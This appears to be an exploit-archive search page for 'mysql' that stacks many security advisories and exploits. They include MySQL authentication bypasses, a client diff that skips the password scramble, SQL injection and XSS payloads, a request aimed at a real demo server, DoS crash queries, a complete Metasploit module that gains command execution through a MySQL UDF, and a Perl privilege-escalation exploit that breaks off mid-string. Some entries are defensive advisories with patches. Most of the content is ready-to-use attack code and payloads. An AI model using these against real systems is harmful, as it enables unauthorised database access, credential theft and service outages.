mysql
Search result for 'mysql'
Viktor Fougstedt/mysql.grant.txt ( na)
Hi.
While installing MySQL 3.22.29 and testing it out, I discovered a
very serious bug in its handling of the GRANT statement.
I have decided to post this message at this time although a fixed
distribution is not yet available at mysql.com. The reason for this is
that the subject has been discussed on the MySQL mailing list, and
that the cat is therefore already out of the bag. Many crackers out
there are already aware of implications and how to exploit this bug. A
temporary solution is suggested in this post, and a patch from TCX is
attached at the bottom.
Affected:
Known: MySQL 3.22.27, 3.22.29, 3.23.8
Suspected: All MySQL versions since 3.22.11.
Impact:
Anyone with access to a running MySQL and GRANT privilege for any
database or table in it, can change any MySQL-password he wishes,
including the MySQL superuser's.
Implications:
If the malicious user has access to run processes on the machine where
MySQL is running, he can hijack the entire database. If he does not
have such access, he can DOS the server by setting the MySQL
superuser's password to a random string.
The 'test'-users installed by MySQL's install scripts have GRANT
privileges for any database whose name begins with 'test', and can
therefore be used to exploit this bug. The 'test' accounts by default
have no passwords set, and no restrictions on where connects can come
from.
This makes all default-configured MySQL very vulnerable (anyone on the
net can change your MySQL superuser password). Be aware, however, that
_any_ user with a GRANT privilege (no matter on which database) in
your MySQL installation can exploit this bug. You may be vulnerable
even if you've removed the 'test' users.
Story:
I contacted the MySQL mailing list and reported this bug (the MySQL
mailing list is the official place to report bugs). The first person
from mysql.com I had a discussion with, said that this was the way it
was supposed to work. GRANT privileges were, according to him, by
definition global (even GRANTs for a single database were apparently
global) and implied the possibility to change anyone's password. I
almost bought his story and started thinking about changing to another
RDBMS.
Fortunately, Monty at TCX Datakonsult AB (the company that originally
wrote MySQL) acknowledged that it was a real and serious bug. No one
without UPDATE privilege on the mysql.user table should be able to set
anyone's password. A fix has been made, and new releases will be
available for download very soon.
Recommendation:
It is STRONGLY RECOMMENDED that anyone running MySQL 3.22.11 or later
UPGRADE to the new versions as soon as they are available at
www.mysql.com and its mirrors.
While waiting for the new versions to arrive, or for an opportunity to
install them:
1) Revoke _all_ GRANT privileges from _all_ users in your MySQL system
except root@localhost. This includes GRANTs in the mysql.db table.
2) Confirm that your root@localhost password has not been altered.
For those of you using source distributions, I have received a patch
for the problem from TCX. It is attached at the bottom of this
message.
Details:
The bug is that the GRANT statement does not properly check privileges
when you give it an IDENTIFIED BY-clause. You can therefore GRANT
someone (including the MySQL superuser) a privilege you yourself
possess, and set her/his password at the same time using IDENTIFIED BY.
Which privilege you pass on does not matter. It is the side-effect
of the IDENTIFIED BY that does the magic. This can be exploited
regardless of your other permissions. You only need the GRANT
privilege for _any_ table or database to exploit this bug.
For someone having login access to the machine running MySQL,
hijacking the database is trivial once the MySQL superuser password
has been changed using the above method. For someone without login
access, changing the superuser password can be a simple way of
DOS:ing, or of extortion.
In the default setup, MySQL prohibits access to the superuser account
from any other hosts than localhost. Sites that allow superusers to
connect from the net may be vulnerable to hijacking from malicious
users without local access.
Since the password-less 'test'-accounts created by MySQL installation
scripts have GRANT privileges for any database whose name begins with
'test', they can be used to exploit this bug. Very nasty.
Exploit:
I will post an exploit as soon as the patched versions are available
(which should be tomorrow). The Kiddiez should be forced to do at
least _some_ work themselves. :-)
/Viktor...
----------------------------------------------------------------------
*** /my/monty/master/mysql-3.23.8-alpha/sql/sql_parse.cc Fri Dec 31 13:53:03 1999
--- ./sql_parse.cc Mon Jan 10 21:53:59 2000
***************
*** 1222,1227 ****
--- 1222,1246 ----
tables ? &tables->grant.privilege : 0,
tables ? 0 : 1))
goto error;
+
+ /* Check that the user isn't trying to change a password for
another
+ user if he doesn't have UPDATE privilege to the MySQL database
*/
+
+ List_iterator <LEX_USER> user_list(lex->users_list);
+ LEX_USER *user;
+ while ((user=user_list++))
+ {
+ if (user->password.str &&
+ (strcmp(thd->user,user->user.str) ||
+ user->host.str && my_strcasecmp(user->host.str,
+ thd->host ? thd->host :
thd->ip)))
+ {
+ if (check_access(thd, UPDATE_ACL, "mysql",0,1))
+ goto error;
+ break; // We are allowed to
do changes
+ }
+ }
+
if (tables)
{
if (grant_option && check_grant(thd,
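Review bot: the user/host test in the loop, `strcmp(thd->user,user->user.str) || user->host.str && my_strcasecmp(...)`, depends on `&&` binding tighter than `||`; it is correct as written (a missing host skips the host comparison and only the user name is compared), but parentheses around the host clause would make that intent explicit and avoid the compiler's precedence warning. The `break` after a successful `check_access` is also fine, since holding UPDATE on the mysql database settles the question for every user in the list, but a one-line comment saying so would save the next reader the same reasoning. Note that the check only fires when `user->password.str` is set, so a GRANT without an IDENTIFIED BY clause is unaffected, which matches the advisory's description of the bug.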
----------------------------------------------------------------------
--| Viktor Fougstedt, system administrator at dtek.chalmers.se |--
--| http://www.dtek.chalmers.se/~viktor/ |--
--| ...soon we'll be sliding down the razor blade of life. /Tom Lehrer |--
Anyone with access to a running MySQL and GRANT privilege for any database or table in it, can change any MySQL-password he wishes, including the MySQL superuser's. This makes all default-configured MySQL very vulnerable.
Emphyrio/mysql.txt ( na)
Hi,
Below you find a security advisory I wrote concerning a vulnerability found in
all (known to me) mysql server versions, including the latest one.
As mysql is a widely used sql platform, I strongly advise everyone using it
to read it, and fix where appropriate.
This email has been bcc'd to the mysql bug list, and other appropriate parties.
Greets,
Robert van der Meulen/Emphyrio
.Introduction.
There exists a vulnerability in the password checking routines in the latest
versions of the MySQL server, that allows any user on a host that is allowed
to connect to the server, to skip password authentication, and access databases.
For the exploit to work, a valid username for the mysql server is needed, and
this username must have access to the database server, when connecting from
the attacking host.
.Vulnerable Systems.
All systems running 3.22.26a and up (tested).
Probably all systems running lower versions as well (not tested, not reviewed).
All versions are vulnerable on all platforms.
.A snippet of code from the mysql code, explaining password authentication.
From mysql-3.22.26a/sql/password.c:
/* password checking routines */
/*****************************************************************************
The main idea is that no password are sent between client & server on
connection and that no password are saved in mysql in a decodable form.
On connection a random string is generated and sent to the client.
The client generates a new string with a random generator inited with
the hash values from the password and the sent string.
This 'check' string is sent to the server where it is compared with
a string generated from the stored hash_value of the password and the
random string.
<cut>
*****************************************************************************/
.More code, and vulnerability explanation.
The problem is, that in the comparison between the 'check' string, and the
string generated from the hash_value of the password and the random string,
the following code is used (from mysql-3.22.26a/sql/password.c):
    while (*scrambled)
    {
      if (*scrambled++ != (char) (*to++ ^ extra))
        return 1;                               /* Wrong password */
    }
'scrambled' represents the 'check' value, and (*to++ ^ extra) walks through the
hash_value.
Suppose a client would send a _single_ character to the server as the 'check'
string.
Of course the server should notice the check string is not the same length as
the check string needed, and give a password error.
Because no such checks are done, when a check string of length 1 is passed to
the server, only one character is compared.
So the only thing that remains to know if we want to peek in someone's MySQL
database, is a technique to find out the first character of the server-side
check string.
The string that's used for the comparison is generated using some random data,
so two following authenticate-actions will probably use different check-strings.
After looking at the algorithm, generating the check string, it becomes clear
that there are actually only 32 possibilities for each character.
In practice, this means that if you connect, sending one single character as
the check string, you will be in, in about 32 tries maximum.
.Impact.
Hosts in the access list (by default any host, on a lot of distributions and
servers) can connect to the MySQL server, without a password, and access
(often sensitive) data _as long as the attacker has a valid username for the
database server_.
This vulnerability also incorporates a MySQL DoS attack, as the attacker can
shutdown database servers and delete data, if she logs in with the MySQL
management account.
.Exploit information.
I have an exploit available, but to deter script kiddies I will not release
it (yet). Do not ask me for it.
If above explanation is understood, an exploit should be easy enough...
.Fix information.
Change the routine 'check_scramble' in mysql-3.22.26a/sql/password.c to do a
length check, _before_ starting the compare.
This should be as easy as inserting the following just above the
while (*scrambled) loop:
    if (strlen(scrambled) != strlen(to)) {
      return 1;                                 /* Wrong password */
    }
WARNING: This is NOT an official fix. You can use this as a temporary solution
to the problem.
Please check the official mysql site (www.mysql.org) for a fix.
.Commentary.
I think this exploit should not be a very scary thing to people that know
how to secure their servers.
In practice, there's almost never a need to allow the whole world to connect
to your SQL server, so that part of the deal should be taken care of.
As long as your MySQL ACL is secure, this problem doesn't really occur (unless
your database server doubles as a shell server).
We have also located several other security bugs in mysql server/client. These
bugs can only be exploited by users who have a valid username and password.
We will send these to the mysql maintainers, and hope they'll come
with a fix soon.
Yours,
Robert van der Meulen/Emphyrio (rvdm@cistron.nl)
Willem Pinckaers (dvorak@synnergy.net)
--
| rvdm@cistron.nl - Cistron Internet Services - www.cistron.nl |
| php3/c/perl/html/c++/sed/awk/linux/sql/cgi/security |
| My statements are mine, and not necessarily cistron's. |
There exists a vulnerability in the password checking routines in the latest versions of the MySQL server, that allows any user on a host that is allowed to connect to the server, to skip password authentication, and access databases. All versions of MySQL up to 3.22.26a are vulnerable.
James Bercegay/mysqlEventum.txt ( na)
##########################################################
# GulfTech Security Research July 31st, 2005
##########################################################
# Vendor : MySQL AB
# URL : http://dev.mysql.com/downloads/other/eventum/
# Version : MySQL AB Eventum <= 1.5.5
# Risk : Multiple Vulnerabilities
##########################################################
Description:
Eventum is a user-friendly and flexible issue tracking system that can
be used by a support department to track incoming technical support
requests, or by a software development team to quickly organize tasks
and bugs. Eventum is used by the MySQL AB Technical Support team.
Unfortunately Eventum is vulnerable to some highly exploitable SQL
Injection issues as well as cross site scripting issues. A new version
of Eventum has been released and users are strongly advised to upgrade
their Eventum installations.
Cross Site Scripting:
There are a number of cross site scripting issues in MySQL Eventum. You
can find several examples of these issues below.
http://eventum/view.php?id=1'%22%3E%3Ciframe%3E
http://eventum/list.php?keywords=&users=&category=&release=%22%3E%3Ciframe%3E
http://eventum/get_jsrs_data.php?F=wee%22%3E%3Ciframe%3E
A malicious user can exploit these vulnerabilities to steal sensitive user
based information, or render hostile script in the context of the victim's
web browser.
SQL Injection:
MySQL Eventum is a very well written program, and does a good job to protect
against harmful input. However, there are a few somewhat blind SQL Injection
issues in Eventum, and these issues are very exploitable. First, let's have
a look at /includes/class.auth.php
    /**
     * Checks whether the provided password match against the email
     * address provided.
     *
     * @access  public
     * @param   string $email The email address to check for
     * @param   string $password The password of the user to check for
     * @return  boolean
     */
    function isCorrectPassword($email, $password)
    {
        $stmt = "SELECT usr_password FROM " . APP_DEFAULT_DB . "." . APP_TABLE_PREFIX . "user WHERE usr_email='$email'";
        $passwd = $GLOBALS["db_api"]->dbh->getOne($stmt);
        if (PEAR::isError($passwd)) {
            Error_Handler::logError(array($passwd->getMessage(), $passwd->getDebugInfo()), __FILE__, __LINE__);
            return false;
        } else {
            if ($passwd != md5($password)) {
                return false;
            } else {
                return true;
            }
        }
    }
MySQL Eventum usually sanitizes within functions, so as expected the $email
variable is never sanitized before being passed to this vulnerable function.
Also, if the target host is using a database that supports UNION functionality
then we can overwrite the expected returned password, and bypass the password
check! The above issue is very dangerous, but there is a nearly identical
function used alongside the isCorrectPassword function named userExists() and
it is vulnerable in an almost identical manner. In addition to the "pre-auth"
SQL Injection vulns are a few other SQL Injection vulnerabilities.
/reports/custom_fields.php->/includes/class.report.php->getCustomFieldReport()
/reports/custom_fields_graph.php->/includes/class.report.php->getCustomFieldReport()
/manage/releases.php->/includes/class.release.php->insert()
The above is a rough outline of the other vulnerable functions that have been
patched in the recent 1.6.0 release. Users should upgrade immediately.
Solution:
A new version of MySQL Eventum has been released. The official release notes
can be found at the link below.
http://lists.mysql.com/eventum-users/2072
Special thanks to Joao Prado Maia from the MySQL Devel team for a very quick
resolution of these issues.
Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00093-07312005
Credits:
James Bercegay of the GulfTech Security Research Team
MySQL AB Eventum versions 1.5.5 and below suffer from cross site scripting and SQL injection attacks.
nojacipka4/Robert Zimmerman PHP / MYSQL Bypass ( na)
---------------------------------------------------
- Robert Zimmerman PHP / MYSQL SCRIPTS ADMIN BYPASS -
---------------------------------------------------
EXAMPLE SITES :
- illoz.com
- illogator.com
- Drawger.com
- and more ...
EXPLOIT :
Login : '-'
Pass : '-'
And u Got admin access ;)
*/ hackers from Scotland ;)
------------------------------
---- DUNDEE ----- POLISH -----
------------------------------
MoJaCiPkA4 /*
Robert Zimmerman PHP / MYSQL scripts suffer from an administrative bypass vulnerability.
DUNDEE/Robert Zimmerman PHP / MYSQL Scripts Admin Bypass ( php)
---------------------------------------------------
- Robert Zimmerman PHP / MYSQL SCRIPTS ADMIN BYPASS -
---------------------------------------------------
EXPLOIT :
Login : '-'
Pass : '-'
And u Got admin access ;)
*/ hackers from Scotland ;)
------------------------------
---- DUNDEE ----- POLISH -----
------------------------------
MoJaCiPkA4 /*
bambam/mysql.authentication.bypass_client.c.diff ( na)
1941,1956c1941,1942
< if (passwd[0])
< {
< if (mysql->server_capabilities & CLIENT_SECURE_CONNECTION)
< {
< *end++= SCRAMBLE_LENGTH;
< scramble(end, mysql->scramble, passwd);
< end+= SCRAMBLE_LENGTH;
< }
< else
< {
< scramble_323(end, mysql->scramble, passwd);
< end+= SCRAMBLE_LENGTH_323 + 1;
< }
< }
< else
< *end++= '\0'; /* empty password */
---
> sprintf(end,"\x14\x00");
> end+=2;
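Review bot: the replacement drops the whole CLIENT_SECURE_CONNECTION / scramble_323 branch, so the client no longer computes a scramble at all; it emits a single length byte 0x14 (20, the value of SCRAMBLE_LENGTH referenced in the removed branch) followed by a NUL via `sprintf(end,"\x14\x00")` and advances `end` by two. A declared scramble length that is not backed by that many scramble bytes is precisely the malformed packet the server side has to reject, so the defensive reading of this hunk is that the server must validate the advertised length against the bytes actually present in the auth packet and treat any mismatch as a failed login rather than skipping the check. Style-wise, sprintf with an embedded NUL in the format string is a roundabout way to write one byte; `*end++= SCRAMBLE_LENGTH; *end++= '\0';` would say the same thing without the format-string call.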
A .diff file, applied to the MySQL 5.0.0-alpha source distribution will allow building a MySQL client that can be used to connect to a remote MySQL server with no password.
DungPQ/Flex MySQL Connector SQL Injection ( na)
$$$ Flex MySQL Connector Remote SQL Execution Exploit $$$
Flex MySQL Connector
 || License: Commercial
 || Language: English
 || Cost: $45.00
 || Platform: Flash Player 9 | Flash Player 10
 || Demo: http://flexappsstore.com/flexapps/demo/mysql/
Credit
 || Name: ~Fyodor (aka DungPQ)
 || Email: quangdung181188[at]gmail.com
 || Location: Hanoi, Vietnam

[$] Vulnz Description :
Flex MySQL Connector is a Flex Component from FlexAppsStore, which allows running SQL from ActionScript via a PHP backend (Flash <=> PHP <=> MySQL). But anybody can modify the SQL command in the Request packet and send it to the PHP backend, which means anybody can run SQL commands against the victim's MySQL server => OMG !

[$] Exploitz :
Send the example SQL command to MySQL at http://flexappsstore.com/flexapps/demo/mysql/
-----------------------------------------------------------------------------------
> Dest.IP = 66.147.242.177
> Dest.PORT = 80
---[Request BOF]---
POST /flexapps/flexmysqlconn.php?irand=0.2112374654971063 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.10
Host: www.flexappsstore.com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://flexappsstore.com/flexapps/demo/mysql/index.swf
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
Content-Length: 89
Content-type: application/x-www-form-urlencoded

fas%5Fdb=flexapps%5Fdemxo&fas%5Fsql=SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig
---[Request EOF]---
(Oh yeah, the SQL command is SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig => SELECT count(*) as cnt1 FROM tbl_bigbig)

[$] PS: I don't give full PoC source code. You can make your own PoC in PHP (using fsockopen(), cURL, ...) but if you want, contact me. ^_^
[$] ~Fyodor - The Still Lake
Flex MySQL Connector suffers from a remote SQL injection vulnerability.
Crackers_Child/MysqlDumper-1.21.txt ( na)
#########################################################
MysqlDumper Version 1.21 b6 Xss Vulnerability
#########################################################
By Crackers_Child
crackers_child@sibersavascilar.com
www.sibersavacilar.com
#########################################################
Download Script
http://www.mysqldumper.de/board/downloads.php?view=detail&id=17
#########################################################
Exploit
#########################################################
www.site.com/mysqldumper_path/sql.php?db=[Xss codes]
#########################################################
Examples
/mysqldumper_path/sql.php?db=<script>alert(document.cookie)</script>
/mysqldumper_path/sql.php?db=<script>alert(/HACKED BY CRACKERS_CHİLD)</script>
#########################################################
Greetz: All My Friends !
#########################################################
MysqlDumper 1.21 suffers from cross site scripting in sql.php.
Shane Bester/Oracle MySQL WITH ROLLUP Denial Of Service ( na)
MySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49.
NOTE: This issue was previously covered in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record to better document it.
PoC:
drop table if exists `t1`;
create table `t1`(`a` int)engine=myisam;
insert into `t1` values (1);
/*crash1*/select (`a` in (`a`,`a`)) from `t1` group by `a` with rollup;
/*crash2*/select (case (`a`) when (`a`) then (`a`) end) as `a` from `t1` group by `a` with rollup;
Oracle MySQL versions prior to 5.1.49 suffer from a WITH ROLLUP related denial of service vulnerability.
Bernardo Damele/MySQL 4/5/6 UDF for Command Execution ( linux)
MySQL UDF for command execution
[1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
[2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz
mirror: http://exploit-db.com/sploits/2009-lib_mysqludf_sys_0.0.3.tar.gz
# milw0rm.com [2009-01-25]
metasploit/Oracle MySQL for Microsoft Windows Payload Execution ( windows)
##
# $Id: mysql_payload.rb 11899 2011-03-08 22:42:26Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::CmdStagerVBS

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle MySQL for Microsoft Windows Payload Execution',
      'Description'    => %q{
        This module creates and enables a custom UDF (user defined function) on the
        target host via the SELECT ... into DUMPFILE method of binary injection. On
        default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
        permissions not enforced, and the MySQL service runs as LocalSystem.

        NOTE: This module will leave a payload executable on the target system when the
        attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
        and sys_exec() functions.
      },
      'Author'         =>
        [
          'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
          'todb' # this Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 11899 $',
      'References'     =>
        [
          # Bernardo's work with cmd exec via udf
          [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ],
          # Advice from 2005 on securing MySQL on Windows, kind of helpful.
          [ 'URL', 'http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
    ))

    register_options(
      [
        OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
        OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
        OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
      ])
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def login_and_get_sys_exec
    mysql_login(username,password,'mysql')
    @mysql_arch = mysql_get_arch
    @mysql_sys_exec_available = mysql_check_for_sys_exec()
    if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
      mysql_add_sys_exec
      @mysql_sys_exec_available = mysql_check_for_sys_exec()
    else
      print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
    end
  end

  def execute_command(cmd, opts)
    mysql_sys_exec(cmd, datastore['VERBOSE'])
  end

  def exploit
    login_and_get_sys_exec()
    if not @mysql_handle
      print_status("Invalid MySQL credentials")
      return
    elsif not [:win32,:win64].include?(@mysql_arch)
      print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
      return
    else
      if @mysql_sys_exec_available
        execute_cmdstager({:linemax => 1500, :nodelete => true})
        handler
      else
        print_status("MySQL function sys_exec() not available")
        return
      end
    end
    disconnect
  end
end
gat3way/ProFTPd with mod_mysql Authentication Bypass Vulnerability ( multiple)
Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
and a password of "1" (without quotes).
which leads to a successful login. Different account logins can be made successful using the LIMIT clause (e.g. appending "LIMIT 5,1" will log you in as the 5th account in the users table).
As far as I can see in the mysql logs the query becomes:
SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1
I think the problem lies in the handling of the "%" character (probably that's some way to sanitize input to avoid format string things?).
Anyway, %' effectively makes the single quote unescaped and that eventually allows for an SQL injection during login.
# milw0rm.com [2009-02-10]
Shane Bester/Oracle MySQL 'ALTER DATABASE' Remote Denial Of Service Vulnerability ( multiple)
A vulnerability was reported in MySQL. A remote authenticated user can cause denial of service conditions. This issue affects versions prior to MySQL 5.1.48.
A remote authenticated user can send a specially crafted ALTER DATABASE command to cause the target server to move a data directory into a new subdirectory, causing the data directory to become unusable.
A demonstration exploit request is provided [where "<special>" is "." or ".." or is a sequence that begins with "./" or "../"]:
ALTER DATABASE `#mysql50#<special>` UPGRADE DATA DIRECTORY NAME
Vendor advisory at: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-48.html
Kingcope/MySQL (Linux) Database Privilege Elevation Zeroday Exploit ( linux)
use DBI();
$|=1;
=for comment
MySQL privilege elevation Exploit
This exploit adds a new admin user.
By Kingcope
Tested on
* Debian Lenny (mysql-5.0.51a)
* OpenSuSE 11.4 (5.1.53-log)
How it works:
This exploit makes use of several things:
*The attacker is in possession of a mysql user with 'file' privileges for the target
*So the attacker can create files on the system with this user (owned by user 'mysql')
*So the attacker is able to create TRIGGER files for a mysql table
triggers can be used to trigger an event when a mysql command is executed by the user,
normally triggers are 'attached' to a user and will be executed with this users privilege.
because we can write any contents into the TRG file (the actual trigger file), we write the entry
describing the attached user for the trigger as "root@localhost" what is the default admin user.
* We make use of the stack overrun priorly discovered to flush the server config so the trigger file is recognized.
This step is really important, without crashing the mysql server instance and reconnecting (the server will respawn)
the trigger file would not be recognized.
So what the exploit does is:
* Connect to the MySQL Server
* Create a table named rootme for the trigger
* Create the trigger file in /var/lib/mysql/<databasename>/rootme.TRG
* Crash the MySQL Server to force it to respawn and recognize the trigger file (by triggering the stack overrun)
* INSERT a value into the table so the trigger event gets executed
* The trigger now sets all privileges of the current connecting user in the mysql.user table to enabled.
* Crash the MySQL Server again to force it reload the user configuration
* Create a new mysql user with all privileges set to enabled
* Crash again to reload configuration
* Connect by using the newly created user
* The new connection has ADMIN access now to all databases in mysql
* The user and password hashes in the mysql.user table are dumped for a convenient way to show the exploit succeeded
* As said the user has FULL ACCESS to the database now
Respawning of mysqld is done by mysqld_safe so this is not an issue in any configuration I've seen.
=cut
=for comment
user created for testing (file privs with minor privileges to only one database):
mysql> CREATE USER 'less'@'%' IDENTIFIED BY 'test';
Query OK, 0 rows affected (0.00 sec)
mysql> create database lessdb
-> ;
Query OK, 1 row affected (0.00 sec)
mysql> GRANT ALL PRIVILEGES ON lessdb.* TO 'less'@'%' WITH GRANT OPTION;
Query OK, 0 rows affected (0.02 sec)
mysql> GRANT FILE ON *.* TO 'less'@'%' WITH GRANT OPTION;
Query OK, 0 rows affected (0.00 sec)
login with new unprivileged user:
mysql> select * from mysql.user;
ERROR 1142 (42000): SELECT command denied to user 'less2'@'localhost' for table 'user'
=cut
=for comment
example attack output:
C:\Users\kingcope\Desktop>perl mysql_privilege_elevation.pl
select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/lessdb3/rootme.TRG' LINES TER
MINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after ins
ert on rootme for each row\\nbegin \\nUPDATE mysql.user SET Select_priv=\\\'Y\\\
', Insert_priv=\\\'Y\\\', Update_priv=\\\'Y\\\', Delete_priv=\\\'Y\\\', Create_p
riv=\\\'Y\\\', Drop_priv=\\\'Y\\\', Reload_priv=\\\'Y\\\', Shutdown_priv=\\\'Y\\
\', Process_priv=\\\'Y\\\', File_priv=\\\'Y\\\', Grant_priv=\\\'Y\\\', Reference
s_priv=\\\'Y\\\', Index_priv=\\\'Y\\\', Alter_priv=\\\'Y\\\', Show_db_priv=\\\'Y
\\\', Super_priv=\\\'Y\\\', Create_tmp_table_priv=\\\'Y\\\', Lock_tables_priv=\\
\'Y\\\', Execute_priv=\\\'Y\\\', Repl_slave_priv=\\\'Y\\\', Repl_client_priv=\\\
'Y\\\', Create_view_priv=\\\'Y\\\', Show_view_priv=\\\'Y\\\', Create_routine_pri
v=\\\'Y\\\', Alter_routine_priv=\\\'Y\\\', Create_user_priv=\\\'Y\\\', ssl_type=
\\\'Y\\\', ssl_cipher=\\\'Y\\\', x509_issuer=\\\'Y\\\', x509_subject=\\\'Y\\\',
max_questions=\\\'Y\\\', max_updates=\\\'Y\\\', max_connections=\\\'Y\\\' WHERE
User=\\\'less3\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs
_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'lati
n1_swedish_ci\'\n';DBD::mysql::db do failed: Unknown table 'rootme' at mysql_pri
vilege_elevation.pl line 44.
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql_
privilege_elevation.pl line 50.
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql_
privilege_elevation.pl line 59.
W00TW00T!
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
Found a row: id = debian-sys-maint, name = *C5524C128621D8A050B6DD616B06862F9D64
B02C
Found a row: id = some1, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = monty, name = *BF06A06D69EC935E85659FCDED1F6A80426ABD3B
Found a row: id = less, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = r00ted, name = *EAD0219784E951FEE4B82C2670C9A06D35FD5697
Found a row: id = user, name = *14E65567ABDB5135D0CFD9A70B3032C179A49EE7
Found a row: id = less2, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = less3, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = rootedsql, name = *4149A2E66A41BD7C8F99D7F5DF6F3522B9D7D9BC
=cut
$user = "less10";
$password = "test";
$database = "lessdb10";
$target = "192.168.2.4";
$folder = "/var/lib/mysql/"; # Linux
$newuser = "rootedbox2";
$newuserpass = "rootedbox2";
$mysql_version = "51"; # can be 51 or 50
if ($mysql_version eq "50") {
$inject =
"select 'TYPE=TRIGGERS' into outfile'".$folder.$database."/rootme.TRG' LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost` trigger atk after insert on rootme for each row\\\\nbegin \\\\nUPDATE mysql.user SET Select_priv=\\\\\\'Y\\\\\\', Insert_priv=\\\\\\'Y\\\\\\', Update_priv=\\\\\\'Y\\\\\\', Delete_priv=\\\\\\'Y\\\\\\', Create_priv=\\\\\\'Y\\\\\\', Drop_priv=\\\\\\'Y\\\\\\', Reload_priv=\\\\\\'Y\\\\\\', Shutdown_priv=\\\\\\'Y\\\\\\', Process_priv=\\\\\\'Y\\\\\\', File_priv=\\\\\\'Y\\\\\\', Grant_priv=\\\\\\'Y\\\\\\', References_priv=\\\\\\'Y\\\\\\', Index_priv=\\\\\\'Y\\\\\\', Alter_priv=\\\\\\'Y\\\\\\', Show_db_priv=\\\\\\'Y\\\\\\', Super_priv=\\\\\\'Y\\\\\\', Create_tmp_table_priv=\\\\\\'Y\\\\\\', Lock_tables_priv=\\\\\\'Y\\\\\\', Execute_priv=\\\\\\'Y\\\\\\', Repl_slave_priv=\\\\\\'Y\\\\\\', Repl_client_priv=\\\\\\'Y\\\\\\', Create_view_priv=\\\\\\'Y\\\\\\', Show_view_priv=\\\\\\'Y\\\\\\', Create_routine_priv=\\\\\\'Y\\\\\\', Alter_routine_priv=\\\\\\'Y\\\\\\', Create_user_priv=\\\\\\'Y\\\\\\', ssl_type=\\\\\\'Y\\\\\\', ssl_cipher=\\\\\\'Y\\\\\\', x509_issuer=\\\\\\'Y\\\\\\', x509_subject=\\\\\\'Y\\\\\\', max_questions=\\\\\\'Y\\\\\\', max_updates=\\\\\\'Y\\\\\\', max_connections=\\\\\\'Y\\\\\\' WHERE User=\\\\\\'$user\\\\\\';\\\\nend\\'\\nsql_modes=0\\ndefiners=\\'root\@localhost\\'\\nclient_cs_names=\\'latin1\\'\\nconnection_cl_names=\\'latin1_swedish_ci\\'\\ndb_cl_names=\\'latin1_swedish_ci\\'\\n';";
} else {
$inject =
